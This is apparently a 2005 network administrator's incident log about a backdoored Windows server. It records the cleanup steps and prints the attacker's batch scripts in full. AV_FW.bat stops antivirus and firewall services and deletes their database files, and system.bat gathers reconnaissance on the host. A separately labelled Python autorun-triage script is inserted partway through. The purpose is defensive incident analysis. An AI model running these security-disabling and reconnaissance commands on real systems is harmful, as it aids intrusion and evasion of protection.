Network Admin Log_JAN062005

2005-01-06 13:30:00


First thing in the morning, as soon as I powered on, Host Monitor reported a problem with the Web Server: SQL Server No Answer. After remoting into the machine, AVG's scheduled scan reported that Secure.bat in the HELP directory under C:\WINNT\SYSTEM32\SPOOL\ carried a virus. Following that lead, I found that C:\WINNT\SYSTEM32\SPOOL\ contained one more hidden directory than usual, named Help, so, like the police (BaiBai), I took a snapshot of the scene with ALT+Print Screen, then packaged up the Help directory, deleted the directory, and wrote the incident into the system operations log. Unfortunately, I had deleted the trigger, Secure.bat, the moment it was found; in future, when a problem is found, the scene must be preserved first and handled afterwards.

Analysing the contents of Help (listed below): it is mostly information gathering, plus a Telsrv program, fully in the spirit of Sun Tzu's Art of War, "know yourself and know your enemy, and you will not be imperilled in a hundred battles":

AV_FW.bat: stops the services of assorted anti-virus products and firewalls such as BlackICE, and at the end also deletes the scan history and virus database files;
Fport.exe: collects port information, including the process listening on each port, and saves the results to Fport.txt;
regedit.exe: the Registry Editor;
kill.exe: PsKill v1.03 - local and remote process killer;
system.bat: reports system information, looks for Serv-U, and saves the results to Systeminfo.txt;
telsrv.exe: a Telnet Server, http://www.pcmicro.com/netfoss/telsrv.html

Since I had taken over this server myself, and it is an All in One server, I went step by step:

※ Using Secure.bat as a search term, I found on Google a Symantec security bulletin about Backdoor.Sumtax: http://securityresponse.symantec.com/avcenter/venc/data/backdoor.sumtax.html; I checked the locations it lists according to its instructions and cleaned up the registry;
※ Re-examined the services and shut down every one that is not needed (and wondered how so many miscellaneous services had come to be enabled);
※ Used %SystemRoot%\system32\wupdmgr.exe to pull all patches from Microsoft's site;
※ Changed the SQL Server SA password again, renamed the local Administrator account and changed its password too, and recorded this in the server operations report;
※ Killed all suspicious processes, and inspected the following keys, cutting out every suspicious entry;
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
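A defender's triage script for the four autorun keys listed above, as an added example that is not part of the original log: it parses a regedit /e style export (the sample export below is constructed, and its entry names are invented for illustration) and flags values that run from the spooler directory or reference the file names of the toolkit found in Help.

```python
import re

# The four autorun keys the log says were inspected.
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# File names taken from the incident: the dropper plus the toolkit in spool\Help.
TOOL_NAMES = ("secure.bat", "av_fw.bat", "system.bat", "telsrv.exe", "fport.exe", "kill.exe")
SPOOL_DIR = "\\system32\\spool\\"   # nothing legitimate autoruns from the spooler directory
VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values in a .reg export."""
    entries, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            entries.setdefault(current, {})
        elif current and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:   # .reg files double every backslash inside quoted data
                entries[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return entries

def suspicious_autoruns(entries):
    """List (key, value_name, command) for Run/RunOnce values that deserve a closer look."""
    by_key = {k.lower(): v for k, v in entries.items()}   # registry paths are case-insensitive
    hits = []
    for key in RUN_KEYS:
        for name, command in by_key.get(key.lower(), {}).items():
            low = command.lower()
            if SPOOL_DIR in low or any(tool in low for tool in TOOL_NAMES):
                hits.append((key, name, command))
    return hits

# Constructed sample export: one benign entry and two modelled on this incident.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
"Winsock Update"="C:\\WINNT\\system32\\spool\\Help\\telsrv.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Secure"="cmd /c C:\\WINNT\\SYSTEM32\\SPOOL\\HELP\\Secure.bat"
"""
```

On a suspect host, export the four keys with regedit /e and pass the file's text to suspicious_autoruns(parse_reg_export(text)); values with hex: data or the default (@) value are skipped and should be reviewed by hand.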


Contents of AV_FW.bat:
net stop _Avp32.exe /y << av_fw.txt
net stop _Avpcc.exe /y << av_fw.txt
net stop _Avpm.exe /y << av_fw.txt
net stop Ackwin32.exe /y << av_fw.txt
net stop Agnitum Outpost Firewall /y << av_fw.txt
net stop Anti-Trojan.exe /y << av_fw.txt
net stop ANTIVIR /y << av_fw.txt
......
net stop AVCONSOL /y << av_fw.txt
net stop WEBTRAP /y << av_fw.txt
net stop POP3TRAP /y << av_fw.txt
del c:/*ANTI-VIR*.DAT /s /q << av_fw.txt
del c:/*CHKLIST*.DAT /s /q << av_fw.txt
del c:/*CHKLIST*.MS /s /q << av_fw.txt
del c:/*CHKLIST*.CPS /s /q << av_fw.txt
del c:/*CHKLIST*.TAV /s /q v
......

Contents of system.bat:
@echo off
echo System Information: < Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt

#OPERATING SYSTEM
echo ___________________ << Systeminfo.txt
echo Operating System... << Systeminfo.txt
echo ?<< Systeminfo.txt

VER << Systeminfo.txt

#FREE SPACE
echo _____________ << Systeminfo.txt
echo Free Space... << Systeminfo.txt
echo ?<< Systeminfo.txt

dir c: | find "bytes" << Systeminfo.txt
dir c: | find "libres" << Systeminfo.txt
dir d: | find "bytes" << Systeminfo.txt
dir d: | find "libres" << Systeminfo.txt
dir e: | find "bytes" << Systeminfo.txt
dir e: | find "libres" << Systeminfo.txt
dir f: | find "bytes" << Systeminfo.txt
dir f: | find "libres" << Systeminfo.txt
dir g: | find "bytes" << Systeminfo.txt
dir g: | find "libres" << Systeminfo.txt
dir h: | find "bytes" << Systeminfo.txt
dir h: | find "libres" << Systeminfo.txt

#FINDING SERVU
echo ________________ << Systeminfo.txt
echo Finding Servu... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/Ser*.ini << Systeminfo.txt
Dir /s /a d:/Ser*.ini << Systeminfo.txt
Dir /s /a e:/Ser*.ini << Systeminfo.txt
Dir /s /a c:/Ser*.exe << Systeminfo.txt
Dir /s /a d:/Ser*.exe << Systeminfo.txt
Dir /s /a e:/Ser*.exe << Systeminfo.txt

#FINDING rar
echo ________________ << Systeminfo.txt
echo Finding RAR.. << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/*.rar << Systeminfo.txt
Dir /s /a d:/*.rar << Systeminfo.txt
Dir /s /a e:/*.rar << Systeminfo.txt
Dir /s /a f:/*.rar << Systeminfo.txt
Dir /s /a g:/*.rar << Systeminfo.txt
Dir /s /a h:/*.rar << Systeminfo.txt

#FINDING mp3
echo ________________ << Systeminfo.txt
echo Finding MP3... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/*.mp3 << Systeminfo.txt
Dir /s /a d:/*.mp3 << Systeminfo.txt
Dir /s /a e:/*.mp3 << Systeminfo.txt
Dir /s /a f:/*.mp3 << Systeminfo.txt
Dir /s /a g:/*.mp3 << Systeminfo.txt
Dir /s /a h:/*.mp3 << Systeminfo.txt

#FINDING nfo
echo ________________ << Systeminfo.txt
echo Finding NFO... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/*.nfo << Systeminfo.txt
Dir /s /a d:/*.nfo << Systeminfo.txt
Dir /s /a e:/*.nfo << Systeminfo.txt
Dir /s /a f:/*.nfo << Systeminfo.txt
Dir /s /a g:/*.nfo << Systeminfo.txt
Dir /s /a h:/*.nfo << Systeminfo.txt

#FINDING FTP.EXE
echo ________________ << Systeminfo.txt
echo Finding FTP... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/FTP.EXE << Systeminfo.txt
Dir /s /a d:/FTP.EXE << Systeminfo.txt
Dir /s /a e:/FTP.EXE << Systeminfo.txt
Dir /s /a f:/FTP.EXE << Systeminfo.txt
Dir /s /a g:/FTP.EXE << Systeminfo.txt
Dir /s /a h:/FTP.EXE << Systeminfo.txt

#FINDING TFTP.EXE
echo ________________ << Systeminfo.txt
echo Finding TFTP... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/TFTP.EXE << Systeminfo.txt
Dir /s /a d:/TFTP.EXE << Systeminfo.txt
Dir /s /a e:/TFTP.EXE << Systeminfo.txt
Dir /s /a f:/TFTP.EXE << Systeminfo.txt
Dir /s /a g:/TFTP.EXE << Systeminfo.txt
Dir /s /a h:/TFTP.EXE << Systeminfo.txt

#FINDING FIREDAEMON.EXE
echo ________________ << Systeminfo.txt
echo Finding Firedaemon... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a d:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a e:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a f:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a g:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a h:/FIREDAEMON.EXE << Systeminfo.txt

#FINDING IOFTPD
echo ________________ << Systeminfo.txt
echo Finding Ioftpd... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/io*.ini << Systeminfo.txt
Dir /s /a d:/io*.ini << Systeminfo.txt
Dir /s /a c:/io*.exe << Systeminfo.txt
Dir /s /a d:/io*.exe << Systeminfo.txt
Dir /s /a c:/rai*.ini << Systeminfo.txt
Dir /s /a d:/rai*.ini << Systeminfo.txt
Dir /s /a c:/rai*.exe << Systeminfo.txt
Dir /s /a d:/rai*.exe << Systeminfo.txt

#FINDING Sub0t.ini
echo ________________ << Systeminfo.txt
echo Finding Sub0t.ini... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/Sub0t.ini << Systeminfo.txt
Dir /s /a d:/Sub0t.ini << Systeminfo.txt
Dir /s /a e:/Sub0t.ini << Systeminfo.txt
Dir /s /a c:/svrany.exe << Systeminfo.txt
Dir /s /a d:/svrany.exe << Systeminfo.txt

#FINDING ftpc.exe
echo ________________ << Systeminfo.txt
echo Finding ftpc.exe... << Systeminfo.txt
echo  << Systeminfo.txt

Dir /s /a c:/ftpc.exe << Systeminfo.txt
Dir /s /a d:/ftpc.exe << Systeminfo.txt
Dir /s /a e:/ftpc.exe << Systeminfo.txt
Dir /s /a f:/ftpc.exe << Systeminfo.txt
Dir /s /a g:/ftpc.exe << Systeminfo.txt
Dir /s /a h:/ftpc.exe << Systeminfo.txt

#RUNNING SERVICES
echo ___________________ << Systeminfo.txt
echo Running Services... << Systeminfo.txt
echo ?<< Systeminfo.txt

NET START << Systeminfo.txt

#RUNNING SERVICES
echo ______ << Systeminfo.txt
echo SET... << Systeminfo.txt
echo  << Systeminfo.txt

SET << Systeminfo.txt

#INSTALLED SOFTWARE
echo _____________________ << Systeminfo.txt
echo Installed Software... << Systeminfo.txt
echo ?<< Systeminfo.txt

Start /Wait Regedit /E %TEMP%./Tmp HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Uninstall
Find "DisplayName" > %TEMP%./Tmp | Find /V "QuietDisplayName" << Systeminfo.txt
Del %TEMP%./Tmp

#INSTALLED SOFTWARE
echo ___________ << Systeminfo.txt
echo NET STAT... << Systeminfo.txt
echo ?<< Systeminfo.txt

NETSTAT << Systeminfo.txt

#RUNNING PROCESSES
echo ____________________ << Systeminfo.txt
echo Running Processes... << Systeminfo.txt
echo  << Systeminfo.txt

TASKLIST /SVC << Systeminfo.txt

#SYSTEM INFO
echo ______________ << Systeminfo.txt
echo System Info... << Systeminfo.txt
echo  << Systeminfo.txt

echo. << Systeminfo.txt
echo. << Systeminfo.txt


